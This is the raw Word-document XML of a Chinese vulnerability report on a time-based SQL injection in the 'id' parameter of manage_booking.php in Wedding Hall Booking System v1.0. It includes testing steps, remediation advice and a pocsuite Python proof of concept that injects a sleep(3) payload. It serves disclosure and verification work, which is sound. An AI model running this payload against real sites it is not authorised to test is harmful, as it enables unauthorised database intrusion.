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漏洞对象：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>whbs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v1.0存在SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pP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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>风险管理及规避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修复</w:t>
      </w:r>
      <w:r>
        <w:t>\whbs\admin\bookings\manage_booking.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的bug，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对G</w:t>
      </w:r>
      <w:r>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式传入的值进行安全过滤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以防止sql注入。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</w:rPr>
        <w:t>测试方法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直接对网站进行抓包，将GET中传入的id值改为sql的sleep语句，之后放回，发现经过3s传来响应，证明存在sql漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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测试中所用的工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Burp Suite Professional 1.7.37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Sqlmap 1.5.2 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  <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="1" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="2" w:name="_Toc11461"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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POC插件编写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pocsuite.api.request import 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pocsuite.api.poc import register,Output, POCBase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pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url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TestPOC(POCBase):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cveID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author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desc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solution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severity = ''''''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references = ['''''']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appPowerLink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samples = ['']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install_requires = ['''''']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_verify(self):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self.url,ip,port = parse_ip_port(self.target,80)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'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'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"/whbs/admin/bookings/manage_booking.php?id=(select+sleep(3))"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vul_url = make_verify_url(self.url, path, mod=0) #生成完整路径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start=time.time()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print(start)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resp = req.get(vul_url, headers = headers, verify = False, allow_redirects = False, timeout = 10)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resp.status_code == 200 : #判断条件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end=time.time()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print(end)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 = http_packet(resp)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result['VerifyInfo']['URL'] = vul_url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result['VerifyInfo']['port'] = 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self.parse_output(result)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_attack(self):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self._verify()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parse_output(self, result):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#parse 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= Output(self)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result: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output.success(result)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output.fail('Failed')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output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register(TestPOC)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漏洞信息</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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2022-07-19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 xml:space="preserve">    2022-07-19 16:18:23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NK-11-XMH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--/ --/ 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color w:val="27A6A8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color w:val="27A6A8"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://www.sourcecodester.com/php/15154/wedding-hall-booking-system-phpoop-free-source-code.html" \t "https://poc.shuziguanxing.com/" \l "/_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="27A6A8"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="6"/>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="27A6A8"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>https://www.sourcecodester.com/php/15154/wedding-hall-booking-system-phpoop-free-source-code.html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="27A6A8"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24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whbs v1.0存在SQL注入漏洞，网站通过GET方式获取id，然后将值拼接到数据库查询语句中查询，在拼接前没有对GET方式传入的值进行安全过滤，导致恶意用户可以输入任意的数据库查询语句，造成sql注入。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5274310" cy="2211070"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="17780"/>
                  <wp:docPr id="2" name="图片 2" descr="图形用户界面, 文本, 应用程序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形用户界面, 文本, 应用程序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1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此文件中画框处，未对GET方式传入的值进行安全过滤，会导致SQL注入</w:t>
            </w:r>
          </w:p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pocsuite.api.request import req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pocsuite.api.poc import register,Output, POCBase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pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url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import time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class TestPOC(POCBase):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cveID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cnvdID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cnnvdID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version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author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createDate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updateDate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name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desc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solution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severity = '''''' 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vulType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taskType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references = ['''''']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appName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appVersion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appPowerLink = ''''''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samples = ['']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install_requires = ['''''']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_verify(self):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self.url,ip,port = parse_ip_port(self.target,80)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 = {}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headers = {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'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'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path = "/whbs/admin/bookings/manage_booking.php?id=(select+sleep(3))"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vul_url = make_verify_url(self.url, path, mod=0) #生成完整路径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start=time.time()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print(start)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resp = req.get(vul_url, headers = headers, verify = False, allow_redirects = False, timeout = 10) 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resp.status_code == 200 : #判断条件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end=time.time()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print(end)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 = http_packet(resp)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result['VerifyInfo']['URL'] = vul_url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result['VerifyInfo']['port'] = port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self.parse_output(result)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_attack(self):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self._verify()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def parse_output(self, result):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#parse output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 = Output(self)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result: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output.success(result)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else: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output.fail('Failed')</w:t>
            </w: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output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</w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>register(TestPOC)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</w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在\whbs\admin\bookings\manage_booking.php文件中，对GET方式传入的id值，进行安全过滤</w:t>
            </w:r>
            <w:bookmarkStart w:id="3" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="3"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val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NDRkYTExYWE0YjljY2Y3MjgwNzc0MTliNWVjOGMifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="012C468C"/>
    <w:rsid w:val="1AA72BF2"/>
    <w:rsid w:val="3EA4637F"/>
    <w:rsid w:val="4723522B"/>
    <w:rsid w:val="533E33EC"/>
    <w:rsid w:val="694411C7"/>
    <w:rsid w:val="6C37064B"/>
    <w:rsid w:val="712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382</Words>
  <Characters>1628</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2322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2022-07-19T06:35:28Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>雪泥鸿影</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-19T08:29:32Z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E782284D3A8E4E4DB46077ECAF671AC9</vt:lpwstr>
  </property>
</Properties>
</file>